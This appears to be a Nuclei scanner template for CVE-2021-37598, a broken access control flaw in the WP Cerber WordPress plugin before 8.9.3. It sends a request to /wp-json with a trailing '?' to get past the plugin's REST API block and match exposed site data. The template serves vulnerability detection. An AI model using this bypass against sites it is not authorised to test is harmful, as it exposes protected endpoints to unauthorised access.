id: CVE-2021-37598

info:
  name: WP Cerber < 8.9.3 - Broken Access Control
  author: theamanrawat
  severity: medium
  description: |
    WP Cerber < 8.9.3 contains a bypass of /wp-json access control caused by improper handling of trailing '?' character, letting unauthorized users access protected REST API endpoints, exploit requires sending a request with a trailing '?'.
  impact: |
    Unauthorized users can access protected REST API endpoints, potentially leading to information disclosure or further exploitation.
  remediation: |
    Update to version 8.9.3 or later.
  reference:
    - https://github.com/mandiant/Vulnerability-Disclosures/blob/master/FEYE-2021-0024/FEYE-2021-0024.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37598
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-37598
    epss-score: 0.05679
    epss-percentile: 0.90554
    cwe-id: CWE-863
  metadata:
    verified: false
    max-request: 3
    vendor: wp-cerber
    product: wp-cerber
  tags: cve,cve2021,wordpress,wp-cerber,access-control,rest-api,exposure,auth-bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json"

    matchers:
      - type: status
        status:
          - 403
          - 404
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-json?"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name":'
          - '"url":'
          - '"home":'
          - '"description":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d802fa05023e5d80f55241831eeaa180329787057d9ca8f0bbefd02025e17fb50221009e8e7b05f78c4b7aa69b995ae038d6741380d45136b2c1e5d11f1cd5d9c2a73d:922c64590222798bb761d5b6d8e72950